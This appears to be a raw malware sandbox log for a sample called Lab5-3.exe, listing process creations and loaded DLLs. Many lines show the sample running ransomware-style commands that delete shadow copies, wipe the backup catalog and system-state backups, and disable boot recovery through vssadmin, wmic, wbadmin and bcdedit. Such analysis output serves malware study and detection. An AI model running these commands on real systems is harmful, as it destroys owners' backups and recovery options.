                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: unknownProcess created: C:\Users\user\Desktop\Lab5-3.exe "C:\Users\user\Desktop\Lab5-3.exe"
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: unknownProcess created: C:\Users\user\Desktop\Lab5-3.exe "C:\Users\user\Desktop\Lab5-3.exe"
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin DELETE SYSTEMSTATEBACKUP
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c wmic SHADOWCOPY /nointeractive
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\bcdedit.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\vssadmin.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1996,i,10208007017991637576,12589176499533245041,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /All /Quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /All /Quiet
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe /c wmic SHADOWCOPY /nointeractive
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin DELETE SYSTEMSTATEBACKUP
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: drprov.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: ntlanman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: davclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: davhlpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: browcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vss_ps.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\wbadmin.exeSection loaded: credui.dll
                      Source: C:\Windows\System32\wbadmin.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbadmin.exeSection loaded: blb_ps.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: bcd.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: spp.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: wer.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: blb_ps.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: vds_ps.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\wbengine.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\vdsldr.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\vdsldr.exeSection loaded: vdsutil.dll
                      Source: C:\Windows\System32\vdsldr.exeSection loaded: bcd.dll
                      Source: C:\Windows\System32\vdsldr.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\vdsldr.exeSection loaded: vds_ps.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: bcd.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: uexfat.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: devobj.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: uudf.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: untfs.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: ufat.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: fmifs.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: vds_ps.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: vdsdyn.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: vdsbas.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: vdsvd.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: virtdisk.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: fltlib.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: hbaapi.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: wmiclnt.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: iscsidsc.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: iscsium.dll
                      Source: C:\Windows\System32\vds.exeSection loaded: fveapi.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: netapi32.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: mpr.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: comsvcs.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: cmlua.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: cmutil.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: version.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: colorui.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: mscms.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: coloradapterclient.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: netapi32.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: mpr.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: drprov.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: winsta.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: ntlanman.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: davclnt.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: davhlpr.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: wkscli.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: windows.storage.dll
